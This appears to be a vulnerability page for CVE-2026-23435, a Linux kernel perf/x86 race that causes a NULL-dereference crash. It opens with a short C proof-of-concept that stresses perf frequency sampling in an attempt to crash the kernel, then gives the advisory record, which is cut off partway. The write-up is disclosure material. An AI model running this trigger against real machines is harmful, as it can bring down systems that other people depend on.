CVE-2026-23435

#include <linux/perf_event.h> #include <sys/syscall.h> #include <unistd.h> #include <string.h> #include <stdio.h> #include <sys/ioctl.h> // PoC for CVE-2026-23435: Triggering the race condition // This code attempts to stress the perf subsystem to trigger the unthrottle path. static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, unsigned long flags) { return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); } int main() { struct perf_event_attr pe; int fd; memset(&pe, 0, sizeof(pe)); pe.type = PERF_TYPE_HARDWARE; pe.size = sizeof(pe); pe.config = PERF_COUNT_HW_CPU_CYCLES; pe.disabled = 0; pe.inherit = 1; // Enable frequency mode to trigger throttling/unthrottling pe.freq = 1; pe.sample_freq = 1000000; fd = perf_event_open(&pe, 0, -1, -1, 0); if (fd == -1) { perror("perf_event_open"); return -1; } printf("Perf event opened. Waiting for potential crash (NMI)..."); fflush(stdout); // Keep the process running to allow the kernel to handle PMU overflows while(1) { sleep(1); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-23435", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:25.083", "lastModified": "2026-04-23T20:59:39.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86: Move event pointer setup earlier in x86_pmu_enable()\n\nA production AMD EPYC system crashed with a NULL pointer dereference\nin the PMU NMI handler:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000198\n RIP: x86_perf_event_update+0xc/0xa0\n Call Trace:\n <NMI>\n amd_pmu_v2_handle_irq+0x1a6/0x390\n perf_event_nmi_handler+0x24/0x40\n\nThe faulting instruction is `cmpq $0x0, 0x198(%rdi)` with RDI=0,\ncorresponding to the `if (unlikely(!hwc->event_base))` check in\nx86_perf_event_update() where hwc = &event->hw and event is NULL.\n\ndrgn inspection of the vmcore on CPU 106 showed a mismatch between\ncpuc->active_mask and cpuc->events[]:\n\n active_mask: 0x1e (bits 1, 2, 3, 4)\n events[1]: 0xff1100136cbd4f38 (valid)\n events[2]: 0x0 (NULL, but active_mask bit 2 set)\n events[3]: 0xff1100076fd2cf38 (valid)\n events[4]: 0xff1100079e990a90 (valid)\n\nThe event that should occupy events[2] was found in event_list[2]\nwith hw.idx=2 and hw.state=0x0, confirming x86_pmu_start() had run\n(which clears hw.state and sets active_mask) but events[2] was\nnever populated.\n\nAnother event (event_list[0]) had hw.state=0x7 (STOPPED|UPTODATE|ARCH),\nshowing it was stopped when the PMU rescheduled events, confirming the\nthrottle-then-reschedule sequence occurred.\n\nThe root cause is commit 7e772a93eb61 (\"perf/x86: Fix NULL event access\nand potential PEBS record loss\") which moved the cpuc->events[idx]\nassignment out of x86_pmu_start() and into step 2 of x86_pmu_enable(),\nafter the PERF_HES_ARCH check. This broke any path that calls\npmu->start() without going through x86_pmu_enable() -- specifically\nthe unthrottle path:\n\n perf_adjust_freq_unthr_events()\n -> perf_event_unthrottle_group()\n -> perf_event_unthrottle()\n -> event->pmu->start(event, 0)\n -> x86_pmu_start() // sets active_mask but not events[]\n\nThe race sequence is:\n\n 1. A group of perf events overflows, triggering group throttle via\n perf_event_throttle_group(). All events are stopped: active_mask\n bits cleared, events[] preserved (x86_pmu_stop no longer clears\n events[] after commit 7e772a93eb61).\n\n 2. While still throttled (PERF_HES_STOPPED), x86_pmu_enable() runs\n due to other scheduling activity. Stopped events that need to\n move counters get PERF_HES_ARCH set and events[old_idx] cleared.\n In step 2 of x86_pmu_enable(), PERF_HES_ARCH causes these events\n to be skipped -- events[new_idx] is never set.\n\n 3. The timer tick unthrottles the group via pmu->start(). Since\n commit 7e772a93eb61 removed the events[] assignment from\n x86_pmu_start(), active_mask[new_idx] is set but events[new_idx]\n remains NULL.\n\n 4. A PMC overflow NMI fires. The handler iterates active counters,\n finds active_mask[2] set, reads events[2] which is NULL, and\n crashes dereferencing it.\n\nMove the cpuc->events[hwc->idx] assignment in x86_pmu_enable() to\nbefore the PERF_HES_ARCH check, so that events[] is populated even\nfor events that are not immediately started. This ensures the\nunthrottle path via pmu->start() always finds a valid event pointer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.13", "versionEndExcluding": "6.18", "matchCriteriaId": "7C298528-1754-41BD-B4E9-84A37AB7BA32"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18.2", "versionEndExcluding": "6.18.20", "matchCriteriaId": "29896448-5F31-40A5-A909-2BC59D21590D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19.1", "versionEndExcluding": "6.19.10", "matchCriteriaId": "D70DEFFE-AC47-4F3A-A2B2-2D67AB4CF3C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:-:*:*:*:*:*:*", "matchCriteriaId": "35C8A871-4971-433E-A046-FC9F7B7D190A"}, {"vulnerab ... (truncated)